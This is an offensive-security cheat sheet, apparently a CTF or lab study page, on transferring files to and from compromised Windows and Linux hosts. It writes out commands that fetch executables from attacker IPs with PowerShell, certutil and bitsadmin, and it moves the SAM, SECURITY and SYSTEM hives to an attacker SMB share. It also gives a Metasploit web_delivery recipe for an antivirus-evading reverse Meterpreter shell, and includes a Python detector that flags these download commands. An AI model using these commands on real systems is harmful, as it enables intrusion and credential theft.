# Uploading Shells/ Transferring Files

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/>" %}
Windows cheatsheet
{% endembed %}

### Transfer files with SSH (SCP)

Copying to the `/tmp` folder is usually best, since it mostly has no restrictions.

```shell
scp /opt/LinEnum.sh pingu@10.10.10.10:/tmp  
```

```shell
scp ubuntu@192.168.1.30:/home/ubuntu/documents.txt notes.txt
```

### Python server

```shell
python3 -m http.server
```

### Basic http-server

```
http-server -p 8080
```

### PowerShell downloading files

```
(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHound.ps1')
```

From cmd:

```
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
```

<figure><img src="/files/TpfNY1M7LAt7QMvdHU5w" alt=""><figcaption></figcaption></figure>

### Certutil (Windows cmd)

```
certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
```

### RDP with shared folder to transfer files - xfreerdp

```
xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads
```

### Download files from server to machine in Windows

```
bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt
```
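The PowerShell, certutil and bitsadmin downloads above each leave a distinctive process command line. The following is an added example, not part of the original notes, of matching them in process-creation logs and recording whether the URL points at a raw IP, as every example on this page does. The rule names, the sample lines and the extra `DownloadString`/`DownloadData` coverage are assumptions made for the illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# One rule per download technique listed above; matched case-insensitively
# against a full process command line (e.g. from process-creation logging).
RULES = {
    "powershell_webclient_download": re.compile(
        r"net\.webclient\b.*\.download(file|string|data)\s*\(", re.I),
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(\.exe)?\b(?=.*[-/]urlcache\b).*https?://", re.I),
    "bitsadmin_transfer_download": re.compile(
        r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)

# Constructed sample command lines (documentation-range IPs, made-up file names).
SAMPLES = [
    r'''powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10:8000/tool.ps1', 'C:\Users\Public\Downloads\tool.ps1')"''',
    r"CERTUTIL.exe -f -URLCACHE http://192.0.2.10/sample.exe sample.exe",
    r"bitsadmin /transfer job1 http://files.example.test:8000/notes.txt C:\Temp\notes.txt",
    r"certutil -hashfile C:\Temp\notes.txt SHA256",  # benign use, must not match
]


def analyze(cmdline):
    """Return matched rules plus the URL and whether its host is a raw IP."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    if not hits:
        return None
    m = URL_RE.search(cmdline)
    url = m.group(0) if m else None
    try:
        # An IP-literal host is a useful prioritisation signal for triage.
        ipaddress.ip_address(urlsplit(url or "").hostname or "")
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    return {"rules": hits, "url": url, "host_is_ip": host_is_ip}


if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line)
```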

### SMB file transfer with Impacket

Start an SMB server on the attacker machine:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

```

We can also use it without specifying a username and password:

```
ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

Now you can make this share available on the Windows system as a separate drive:

```
controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.
```

Now you can transfer files to and from both machines.

```
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 
        1 file(s) copied. 
```

We can also move files directly without mapping the share as a drive.

```
C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.
```

### Evil-winrm

You can use the `upload` and `download` commands to transfer files:

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip
                                        
Info: Download successful!
```

### Complete list of other web servers

{% embed url="<https://gist.github.com/willurd/5720255>" %}

<figure><img src="/files/RNzMlsSa4dVEZKTdg39q" alt=""><figcaption></figcaption></figure>

### Getting a Meterpreter shell on a compromised Windows machine

```
exploit(multi/script/web_delivery)
```

<figure><img src="/files/RTlvuwQALF6PXvPSEmaq" alt=""><figcaption></figcaption></figure>

* `exploit/`: Indicates the use of a module designed to take advantage of a specific vulnerability or system configuration to execute code.
* `multi/`: Signifies that the module is cross-platform and can target multiple operating systems (Windows, Linux, macOS).
* `script/`: Specifies that the exploit delivers its payload via a script (like PowerShell, Python, or PHP).
* `web_delivery`: The name of the module that hosts a payload on a temporary web server. When the victim executes a specific one-liner command, it fetches and runs the payload in memory.

***

#### Utility: PowerShell & Windows Reverse Meterpreter

The primary utility of this module is to gain a fileless reverse shell. Instead of sending an `.exe` file that might be caught by antivirus, you provide a single PowerShell command to the target system.

**1. Usage for Windows Reverse Meterpreter**

To use this for a Windows target, you would configure the module within Metasploit as follows:

* Set Target: `set TARGET 2` (This selects the PowerShell target, as seen in the screenshot above, where `target => 2`).
* Set Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
* Set Local Host: `set LHOST [Your_IP]`
* Execute: Type `run` or `exploit`.

**2. Full Use with PowerShell**

Once you hit `run`, Metasploit will generate a unique PowerShell "one-liner." It looks something like this: `powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -RunAs [Encoded_Command_String]`

<figure><img src="/files/Hbd3Ww8w1ZUkcD6bQBPM" alt=""><figcaption></figcaption></figure>

**Why this is effective:**

* Antivirus Evasion: Because the payload is executed directly in memory via PowerShell, it never touches the hard drive, making it harder for standard antivirus programs to detect.
* Simplicity: You only need a way to execute a single line of text on the victim's machine (e.g., via a compromised web server, a malicious shortcut, or a macro).

